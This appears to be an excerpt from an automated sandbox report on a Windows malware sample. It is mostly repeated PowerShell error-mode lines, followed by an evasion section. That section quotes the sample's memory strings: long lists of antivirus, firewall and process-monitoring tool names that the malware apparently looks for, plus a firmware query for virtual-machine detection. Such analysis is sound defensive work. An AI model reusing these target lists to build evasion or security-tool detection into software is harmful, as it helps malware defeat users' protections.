                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Query firmware table information (likely to detect VMs)
                  Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: explorer.exe, 0000003A.00000003.1824269594.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _SETUP.EXE,AVIRA.SPOTLIGHT.BOOTSTRAPPER.EXE,AVIRA.SPOTLIGHT.BOOTSTRAPPER.ERRORREPORTING.EXE,AVIRA_RU_SPTL1_1478146083-1653898989__PHPWS.EXE,AVIRA_RU_SPTL1_1261326278-1662974870__PAVWS.EXE,STARTUP.EXE,KS4.021.3.10.391RU_25000.EXE,KS4.021.3.10.391EN_25092.EXE,KS4.021.3.10.391EN_25112.EXE,KS4.021.3.10.391EN_25108.EXE,KS4.021.3.10.391EN_25104.EXE,KS4.021.3.10.391EN_25100.EXE,INSTALL KASPERSKY SECURITY CLOUD VERSION 21.3.10.391,DRWEB-12.0-SS-WIN.EXE,WIN-SPACE-SETUP.EXE,WIN-SPACE-SETUP.EXE.LZMA,GB3ANEHTQ5LB.EXE,ZP6NKQL8CJGQP.EXE,NRU5ZUB6LJMSREG.EXE,EPWN7GBAGXFAX4.EXE,EHDTRZXXU.EXE,MBSETUP.EXE,ADAWAREWEBINSTALLER.EXE,CMDINSTALL.EXE,CISPRO_INSTALLER.EXE,ESET_INTERNET_SECURITY_LIVE_INSTALLER.EXE,BOOTHELPER.EXE,ESET_INTERNET_SECURITY_LIVE_INSTALLER.EXE,FORTICLIENTONLINEINSTALLER.EXE,FREEDOMEINSTALLERUI.EXE,FREEDOME.EXE,F-SECURENETWORKINSTALLER-IS.EXE,WEBVIEW2.EXE,ONECLIENT.MSI,F-SECURENETWORKINSTALLER-AV.EXE,FSECUREKEYWIN.EXE,SETUPPROJECTVIRUSUTILITIES_X86_DE.MSI,SETUPPROJECTVIRUSUTILITIES_X64_DE.MSI,INSTALLER.EXE,WEBADVISORINSTALLER.EXE,WEBADVISORINSTALLER32.EXE,WEBADVISORINSTALLER64.EXE,DELEGATE.EXE,INSTALL.EXE,SAFEFAMILYSETUP.EXE,MCCERTUPD.EXE,STUB.EXE,PSINANORUN.EXE,PANDADE.EXE,PANDADA.EXE,PANDADC.EXE,PANDADP.EXE,ZAFWSETUPWEB_158_200_19118.EXE,RESUME ZONEALARM SECURITY INSTALL,LAUNCHER.EXE,CLEAN_TOOL.EXE,CLEAN_TOOL64.EXE,DLTEL.EXE,ZTS3.EXE,ZTS3.TMP,EFPEADM.EXE,VPNGUI.EXE,CVPND.EXE,IPSECLOG.EXE,CFP.EXE,FSDFWD.EXE,FSGUIEXE.EXE,BLACKD.EXE,KPF4GUI.EXE,MSSCLL.EXE,MCSHELL.EXE,MPFSERVICE.EXE,MPFAGENT.EXE,NISUM.EXE,SMC.EXE,PERSFW.EXE,PCCPFW.EXE,WINSS.EXE,ZLCLIENT.EXE,MCODS.EXE,MCSHIELD.EXE,MSMPENG.EXE,NAVAPSVC.EXE,AVKWCTL.EXE,FSAV32.EXE,MCSHIELD.EXE,NTRTSCAN.EXE,AVGUARD.EXE,ASHSERV.EXE,AVENGINE.EXE,AVGEMC.EXE,TMNTSRV.EXE,KAVFSWP.EXE,KAVTRAY.EXE,KAVFSMUI.EXE,KAVSHELL.EXE,KAVFSRCN.EXE,KAVFS.EXE,KAVFSGT.EXE,KAVFSWH.EXE,KAVFSSCS.EXE,AFWSERV.EXE,ASWENGSRV.EXE,ASWIDSAGENT.EXE,ASWTOOLSSVC.EXE,AVASTSVC.EXE,AVASTSVC.EXE,AVASTUI.EXE,WSC_PROXY.EXE,AVASTBROWSER.EXE,AVASTNM.EXE,ASHWEBSV.EXE,ASWUPDSV.EXE,CCSETUP600_PRO_TRIAL.EXE,CCLEANER64.EXE,CCLEANER.EXE,CCUPDATE.EXE,MSIAFTERBURNER.EXE,SETUP.EXE,IOBIT_MALWARE_FIGHTER_SETUP.EXE,IMF.EXE,IMFCORE.EXE,IMFSRV.EXE,IMFTIPS.EXE,IMFSRVWSC.EXE,AIDA64.EXE,CCLEANER.EXE,REGISTRYCLEANER,CCUPDATE.EXE,SECURITYHEALTHSYSTRAY.EXE,AFWSERV.EXE,ASWENGSRV.EXE,ASWIDSAGENT.EXE,ASWTOOLSSVC.EXE,AVASTSVC.EXE,AVASTSVC.EXE,AVASTUI.EXE,WSC_PROXY.EXE,AVASTBROWSER.EXE,AVASTNM.EXE,ASHWEBSV.EXE,ASWUPDSV.EXE,KAVFSWP.EXE,KAVTRAY.EXE,KAVFSMUI.EXE,KAVSHELL.EXE,KAVFSRCN.EXE,KAVFS.EXE,KAVFSGT.EXE,KAVFSWH.EXE,KAVFSSCS.EXE,EFPEADM.EXE,VPNGUI.EXE,CVPND.EXE,IPSECLOG.EXE,CFP.EXE,FSDFWD.EXE,FSGUIEXE.EXE,BLACKD.EXE,KPF4GUI.EXE,MSSCLL.EXE,MCSHELL.EXE,MPFSERVICE.EXE,MPFAGENT.EXE,NISUM.EXE,SMC.EXE,PERSFW.EXE,PCCPFW.EXE,WINSS.EXE,ZLCLIENT.EXE,MCODS.EXE,MCSHIELD.EXE,MSMPENG.EXE,NAVAPSVC.EXE,AVKWCTL.EXE,FSAV32.EXE,MCSHIELD.EXE,NTRTSCAN.EXE,AVGUARD.EXE,ASHSERV.EXE,AVENGINE.EXE,AVGEMC.EXE,TMNTSRV.EXE,ADVCHK.EXE,AHNSD.EXE,ALERTSVC.EXE,AVMAISRV.EXE,AVSYNMGR.EXE,BITDEFENDER_P2P_ST
                  Source: explorer.exe, 0000003A.00000003.3137489888.000000000062B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.2965753779.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                  Source: explorer.exe, 0000003A.00000003.1824354802.000000000060B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000002.4158665690.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.1823929141.00000000005EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                  Source: explorer.exe, 0000003A.00000002.4158665690.00000000005A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,SYSTEMINFORMER.EXE,PROCESSHACKER.EXE,PROCESSHACKER32.EXE,PROCESSHACKER64.EXE,PROCEXP.EXE,PROCEXP64.EXE,PROCEXP64A.EXE,PERFMON.EXE,PERFMON.EXE,SYSTEMEXPLORER.EXE,AUTORUNS.EXE,OPENHARDWAREMONITOR.EXE,PCHUNTER32.EXE,PCHUNTER64.EXE,AIDA64.EXE,HWINFO64GPUZ.EXE,GPU-Z.EXE,MSIAFTERBURNER.EXE,ANVIR.EXE,VIRUSTOTAL-UPLOADER-2-0-EN-WIN.EXEMX
                  Source: explorer.exe, 0000003A.00000003.1824354802.000000000060B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,SYSTEMINFORMER.EXE,PROCESSHACKER.EXE,PROCESSHACKER32.EXE,PROCESSHACKER64.EXE,PROCEXP.EXE,PROCEXP64.EXE,PROCEXP64A.EXE,PERFMON.EXE,PERFMON.EXE,SYSTEMEXPLORER.EXE,AUTORUNS.EXE,OPENHARDWAREMONITOR.EXE,PCHUNTER32.EXE,PCHUNTER64.EXE,AI
                  Source: explorer.exe, 0000003A.00000003.1824354802.000000000060B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGEDIT.EXE,SECURITYCHECK.EXE,AVZ5RN.EXE,HITMANPRO_X64.EXE,HITMANPRO.EXE,ANVIR.EXE,AVBR.EXE,TASKHOSTW.EXE,START.EXE,FRST64.EXE,AVAST_FREE_ANTIVIRUS_SETUP_ONLINE_X64.EXE,AVAST_FREE_ANTIVIRUS_SETUP_ONLINE.EXE,INSTUP.EXE,SBR.EXE,AVG_ANTIVIRUS_FREE_SETUP.EXE,AVIRA.SPOTLIGHT.BOOTSTRAPPER.EXE,AVIRA.SPOTLIGHT.BOOTSTRAPPER.ERRORREPORTING.EXE,AVIRA_RU_SPTL1_1478146083-1653898989__PHPWS.EXE,AVIRA_RU_SPTL1_1261326278-1662974870__PAVWS.EXE,STARTUP.EXE,KS4.021.3.10.391RU_25000.EXE,KS4.021.3.10.391EN_25092.EXE,KS4.021.3.10.391EN_25112.EXE,KS4.021.3.10.391EN_25108.EXE,KS4.021.3.10.391EN_25104.EXE,KS4.021.3.10.391EN_25100.EXE,INSTALL KASPERSKY SECURITY CLOUD VERSION 21.3.10.391,DRWEB-12.0-SS-WIN.EXE,WIN-SPACE-SETUP.EXE,WIN-SPACE-SETUP.EXE.LZMA,GB3ANEHTQ5LB.EXE,ZP6NKQL8CJGQP.EXE,NRU5ZUB6LJMSREG.EXE,EPWN7GBAGXFAX4.EXE,EHDTRZXXU.EXE,MBSETUP.EXE,ADAWAREWEBINSTALLER.EXE,CMDINSTALL.EXE,CISPRO_INSTALLER.EXE,ESET_INTERNET_SECURITY_LIVE_INSTALLER.EXE,BOOTHELPER.EXE,ESET_INTERNET_SECURITY_LIVE_INSTALLER.EXE,FORTICLIENTONLINEINSTALLER.EXE,FREEDOMEINSTALLERUI.EXE,FREEDOME.EXE,F-SECURENETWORKINSTALLER-IS.EXE,WEBVIEW2.EXE,ONECLIENT.MSI,F-SECURENETWORKINSTALLER-AV.EXE,FSECUREKEYWIN.EXE,SETUPPROJECTVIRUSUTILITIES_X86_DE.MSI,SETUPPROJECTVIRUSUTILITIES_X64_DE.MSI,INSTALLER.EXE,WEBADVISORINSTALLER.EXE,WEBADVISORINSTALLER32.EXE,WEBADVISORINSTALLER64.EXE,DELEGATE.EXE,INSTALL.EXE,SAFEFAMILYSETUP.EXE,MCCERTUPD.EXE,STUB.EXE,PSINANORUN.EXE,PANDADE.EXE,PANDADA.EXE,PANDADC.EXE,PANDADP.EXE,ZAFWSETUPWEB_158_200_19118.EXE,RESUME ZONEALARM SECURITY INSTALL,LAUNCHER.EXE,CLEAN_TOOL.EXE,CLEAN_TOOL64.EXE,DLTEL.EXE,ZTS3.EXE,ZTS3.TMP,EFPEADM.EXE,VPNGUI.EXE,CVPND.EXE,IPSECLOG.EXE,CFP.EXE,FSDFWD.EXE,FSGUIEXE.EXE,BLACKD.EXE,KPF4GUI.EXE,MSSCLL.EXE,MCSHELL.EXE,MPFSERVICE.EXE,MPFAGENT.EXE,NISUM.EXE,SMC.EXE,PERSFW.EXE,PCCPFW.EXE,WINSS.EXE,ZLCLIENT.EXE,MCODS.EXE,MCSHIELD.EXE,MSMPENG.EXE,NAVAPSVC.EXE,AVKWCTL.EXE,FSAV32.EXE,MCSHIELD.EXE,NTRTSCAN.EXE,AVGUARD.EXE,ASHSERV.EXE,AVENGINE.EXE,AVGEMC.EXE,TMNTSRV.EXE,KAVFSWP.EXE,KAVTRAY.EXE,KAVFSMUI.EXE,KAVSHELL.EXE,KAVFSRCN.EXE,KAVFS.EXE,KAVFSGT.EXE,KAVFSWH.EXE,KAVFSSCS.EXE,AFWSERV.EXE,ASWENGSRV.EXE,ASWIDSAGENT.EXE,ASWTOOLSSVC.EXE,AVASTSVC.EXE,AVASTSVC.EXE,AVASTUI.EXE,WSC_PROXY.EXE,AVASTBROWSER.EXE,AVASTNM.EXE,ASHWEBSV.EXE,ASWUPDSV.EXE,CCSETUP600_PRO_TRIAL.EXE,CCLEANER64.EXE,CCLEANER.EXE,CCUPDATE.EXE,MSIAFTERBURNER.EXE,SETUP.EXE,IOBIT_MALWARE_FIGHTER_SETUP.EXE,IMF.EXE,IMFCORE.EXE,IMFSRV.EXE,IMFTIPS.EXE,IMFSRVWSC.EXE,AIDA64.EXE,CCLEANER.EXE,REGISTRYCLEANER,CCUPDATE.EXE,SECURITYHEALTHSYSTRAY.EXE,AFWSERV.EXE,ASWENGSRV.EXE,ASWIDSAGENT.EXE,ASWTOOLSSVC.EXE,AVASTSVC.EXE,AVASTSVC.EXE,AVASTUI.EXE,WSC_PROXY.EXE,AVASTBROWSER.EXE,AVASTNM.EXE,ASHWEBSV.EXE,ASWUPDSV.EXE,KAVFSWP.EXE,KAVTRAY.EXE,KAVFSMUI.EXE,KAVSHELL.EXE,KAVFSRCN.EXE,KAVFS.EXE,KAVFSGT.EXE,KAVFSWH.EXE,KAVFSSCS.EXE,EFPEADM.EXE,VPNGUI.EXE,CVPND.EXE,IPSECLOG.EXE,CFP.EXE,FSDFWD.EXE,FSGUIEXE.EXE,BLACKD.EXE,KPF4GUI.EXE,MSSCLL.EXE,MCSHELL.EXE,MPFSERVICE.EXE,MPFAGENT.EXE,NISUM.EXE,SMC.EXE,PERSFW.EXE,PCCPFW.EXE,WINSS.EXE,ZLCL
                  Source: explorer.exe, 0000003A.00000002.4158665690.00000000005A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,SYSTEMINFORMER.EXE,PROCESSHACKER.EXE,PROCESSHACKER32.EXE,PROCESSHACKER64.EXE,PROCEXP.EXE,PROCEXP64.EXE,PROCEXP64A.EXE,PERFMON.EXE,PERFMON.EXE,SYSTEMEXPLORER.EXE,AUTORUNS.EXE,OPENHARDWAREMONITOR.EXE,PCHUNTER32.EXE,PCHUNTER64.EXE,AIDA64.EXE,HWINFO64GPUZ.EXE,GPU-Z.EXE,MSIAFTERBURNER.EXE,ANVIR.EXE,VIRUSTOTAL-UPLOADER-2-0-EN-WIN.EXE
                  Source: explorer.exe, 0000003A.00000003.1824354802.000000000060B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEE
                  Source: explorer.exe, 0000003A.00000003.1824354802.000000000060B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BREGEDIT.EXE,SECURITYCHECK.EXE,AVZ5RN.EXE,HITMANPRO_X64.EXE,HITMANPRO.EXE,ANVIR.EXE,AVBR.EXE,TASKHOSTW.EXE,START.EXE,FRST64.EXE,AVAST_FREE_ANTIVIRUS_SETUP_ONLINE_X64.EXE,AVAST_FREE_ANTIVIRUS_SETUP_ONLINE.EXE,INSTUP.EXE,SBR.EXE,AVG_ANTIVIRUS_FREE_SETUP.EXE,AVIRA.SPOTLIGHT.BOOTSTRAPPER.EXE,AVIRA.SPOTLIGHT.BOOTSTRAPPER.ERRORREPORTING.EXE,AVIRA_RU_SPTL1_1478146083-1653898989__PHPWS.EXE,AVIRA_RU_SPTL1_1261326278-1662974870__PAVWS.EXE,STARTUP.EXE,KS4.021.3.10.391RU_25000.EXE,KS4.021.3.10.391EN_25092.EXE,KS4.021.3.10.391EN_25112.EXE,KS4.021.3.10.391EN_25108.EXE,KS4.021.3.10.391EN_25104.EXE,KS4.021.3.10.391EN_25100.EXE,INSTALL KASPERSKY SECURITY CLOUD VERSION 21.3.10.391,DRWEB-12.0-SS-WIN.EXE,WIN-SPACE-SETUP.EXE,WIN-SPACE-SETUP.EXE.LZMA,GB3ANEHTQ5LB.EXE,ZP6NKQL8CJGQP.EXE,NRU5ZUB6LJMSREG.EXE,EPWN7GBAGXFAX4.EXE,EHDTRZXXU.EXE,MBSETUP.EXE,ADAWAREWEBINSTALLER.EXE,CMDINSTALL.EXE,CISPRO_INSTALLER.EXE,ESET_INTERNET_SECURITY_LIVE_INSTALLER.EXE,BOOTHELPER.EXE,ESET_INTERNET_SECURITY_LIVE_INSTALLER.EXE,FORTICLIENTONLINEINSTALLER.EXE,FREEDOMEINSTALLERUI.EXE,FREEDOME.EXE,F-SECURENETWORKINSTALLER-IS.EXE,WEBVIEW2.EXE,ONECLIENT.MSI,F-SECURENETWORKINSTALLER-AV.EXE,FSECUREKEYWIN.EXE,SETUPPROJECTVIRUSUTILITIES_X86_DE.MSI,SETUPPROJECTVIRUSUTILITIES_X64_DE.MSI,INSTALLER.EXE,WEBADVISORINSTALLER.EXE,WEBADVISORINSTALLER32.EXE,WEBADVISORINSTALLER64.EXE,DELEGATE.EXE,INSTALL.EXE,SAFEFAMILYSETUP.EXE,MCCERTUPD.EXE,STUB.EXE,PSINANORUN.EXE,PANDADE.EXE,PANDADA.EXE,PANDADC.EXE,PANDADP.EXE,ZAFWSETUPWEB_158_200_19118.EXE,RESUME ZONEALARM SECURITY INSTALL,LAUNCHER.EXE,CLEAN_TOOL.EXE,CLEAN_TOOL64.EXE,DLTEL.EXE,ZTS3.EXE,ZTS3.TMP,EFPEADM.EXE,VPNGUI.EXE,CVPND.EXE,IPSECLOG.EXE,CFP.EXE,FSDFWD.EXE,FSGUIEXE.EXE,BLACKD.EXE,KPF4GUI.EXE,MSSCLL.EXE,MCSHELL.EXE,MPFSERVICE.EXE,MPFAGENT.EXE,NISUM.EXE,SMC.EXE,PERSFW.EXE,PCCPFW.EXE,WINSS.EXE,ZLCLIENT.EXE,MCODS.EXE,MCSHIELD.EXE,MSMPENG.EXE,NAVAPSVC.EXE,AVKWCTL.EXE,FSAV32.EXE,MCSHIELD.EXE,NTRTSCAN.EXE,AVGUARD.EXE,ASHSERV.EXE,AVENGINE.EXE,AVGEMC.EXE,TMNTSRV.EXE,KAVFSWP.EXE,KAVTRAY.EXE,KAVFSMUI.EXE,KAVSHELL.EXE,KAVFSRCN.EXE,KAVFS.EXE,KAVFSGT.EXE,KAVFSWH.EXE,KAVFSSCS.EXE,AFWSERV.EXE,ASWENGSRV.EXE,ASWIDSAGENT.EXE,ASWTOOLSSVC.EXE,AVASTSVC.EXE,AVASTSVC.EXE,AVASTUI.EXE,WSC_PROXY.EXE,AVASTBROWSER.EXE,AVASTNM.EXE,ASHWEBSV.EXE,ASWUPDSV.EXE,CCSETUP600_PRO_TRIAL.EXE,CCLEANER64.EXE,CCLEANER.EXE,CCUPDATE.EXE,MSIAFTERBURNER.EXE,SETUP.EXE,IOBIT_MALWARE_FIGHTER_SETUP.EXE,IMF.EXE,IMFCORE.EXE,IMFSRV.EXE,IMFTIPS.EXE,IMFSRVWSC.EXE,AIDA64.EXE,CCLEANER.EXE,REGISTRYCLEANER,CCUPDATE.EXE,SECURITYHEALTHSYSTRAY.EXE,AFWSERV.EXE,ASWENGSRV.EXE,ASWIDSAGENT.EXE,ASWTOOLSSVC.EXE,AVASTSVC.EXE,AVASTSVC.EXE,AVASTUI.EXE,WSC_PROXY.EXE,AVASTBROWSER.EXE,AVASTNM.EXE,ASHWEBSV.EXE,ASWUPDSV.EXE,KAVFSWP.EXE,KAVTRAY.EXE,KAVFSMUI.EXE,KAVSHELL.EXE,KAVFSRCN.EXE,KAVFS.EXE,KAVFSGT.EXE,KAVFSWH.EXE,KAVFSSCS.EXE,EFPEADM.EXE,VPNGUI.EXE,CVPND.EXE,IPSECLOG.EXE,CFP.EXE,FSDFWD.EXE,FSGUIEXE.EXE,BLACKD.EXE,KPF4GUI.EXE,MSSCLL.EXE,MCSHELL.EXE,MPFSERVICE.EXE,MPFAGENT.EXE,NISUM.EXE,SMC.EXE,PERSFW.EXE,PCCPFW.EXE,WINSS.EXE,ZLC
